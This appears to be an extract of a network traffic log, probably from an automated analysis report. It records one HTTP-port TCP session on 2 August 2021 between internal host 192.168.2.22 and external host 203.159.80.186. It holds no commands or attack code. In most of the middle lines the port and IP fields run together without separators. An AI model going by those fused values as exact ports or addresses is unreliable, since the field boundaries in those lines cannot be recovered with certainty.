                                Aug 2, 2021 10:59:58.633157015 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.668368101 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.668478966 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.669049025 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.711807013 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.711848974 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.711873055 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.711899042 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.711983919 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.712629080 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.741183996 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741218090 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741241932 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741264105 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741281986 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.741287947 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741311073 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741317034 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.741338015 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741363049 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.741389036 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.741405010 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.771275043 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771315098 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771339893 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771362066 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771384001 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771404028 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771415949 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.771424055 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771444082 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.771445036 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.771449089 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.771466970 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771476984 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.771487951 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771512985 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771522045 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.771536112 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771558046 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771568060 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.771580935 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771603107 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771612883 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.771625042 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.771656990 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.803600073 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803656101 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803687096 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803713083 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803740978 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.803742886 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803764105 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.803772926 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803832054 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.803839922 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803921938 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803950071 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.803989887 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.803992033 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804030895 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804056883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804107904 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804146051 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804150105 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804176092 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804208994 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804214001 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804244041 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804280043 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804301977 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804342985 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804405928 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804418087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804446936 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804478884 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804481030 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804502010 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804513931 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804526091 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804538012 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804557085 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804570913 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804588079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804601908 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804605961 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804625034 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804632902 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804641962 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.804645061 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804665089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.804698944 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833441019 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833491087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833539009 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833560944 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833599091 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833605051 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833643913 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833678007 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833684921 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833714008 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833748102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833759069 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833787918 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833822966 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833827019 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833857059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833899975 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833913088 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833939075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833972931 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833977938 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834008932 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834043026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834064007 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834078074 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834112883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834119081 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834147930 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834192991 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834254026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834261894 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834290981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834323883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834337950 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834362984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834397078 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834404945 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834430933 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834465981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834477901 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834500074 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834539890 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834544897 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834583044 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834630013 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834651947 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834690094 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834733009 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834763050 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834796906 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834798098 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834834099 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834832907 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834867954 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834908009 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834912062 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834949970 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834985018 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835016966 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835021019 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835103989 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835105896 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835218906 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835257053 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835268974 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835290909 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835330963 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835335016 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835376024 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835411072 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835412979 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.836812973 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.866736889 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.866879940 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.866945982 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867096901 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867172003 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867228031 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867345095 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867541075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867578030 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867607117 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867670059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867705107 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867796898 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867860079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867893934 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868058920 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868113041 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868149996 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868177891 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868241072 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868267059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868284941 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868298054 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868319988 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868328094 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868341923 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868364096 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868375063 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868390083 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868412971 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868421078 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868434906 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868457079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868467093 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868478060 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868498087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868506908 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868520021 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868544102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868561983 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868570089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868592978 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868602037 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868627071 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868644953 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868655920 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868662119 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868679047 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868690968 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868695974 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868714094 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868731022 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868735075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868755102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868772030 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868772030 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868789911 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868808031 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868808985 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868825912 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868843079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868851900 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868860960 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868871927 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868881941 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868902922 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868916035 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868920088 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868937016 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868952990 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868956089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868989944 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896451950 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896485090 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896500111 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896522045 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896543026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896570921 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896569967 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896595001 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896600008 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896617889 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896646023 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899214983 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899250984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899280071 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899301052 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899306059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899333000 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899338007 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899362087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899372101 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899389029 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899415970 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899441004 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899446964 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899475098 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899485111 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899504900 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899530888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899544954 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899555922 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899583101 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899595022 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899609089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899636984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899646044 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900084972 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900110960 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900136948 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900214911 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900258064 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900338888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900369883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900396109 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900403023 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900420904 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900446892 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900451899 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900473118 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900504112 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900505066 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900533915 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900559902 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900568008 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900587082 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900613070 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900618076 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900639057 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900665045 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900666952 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900691986 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900723934 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900724888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900753975 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900779009 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900785923 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900804996 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900830984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900839090 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900856018 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900882006 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900885105 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900907993 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900939941 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900939941 CEST8049167203.159.80.186192.168.2.22
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Aug 2, 2021 10:59:58.900969982 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.900995016 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901004076 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901021957 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901047945 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901052952 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901072979 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901098967 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901107073 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901124954 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901154995 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901156902 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901186943 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901212931 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901221037 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901240110 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901266098 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901269913 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901289940 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901315928 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901320934 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901343107 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
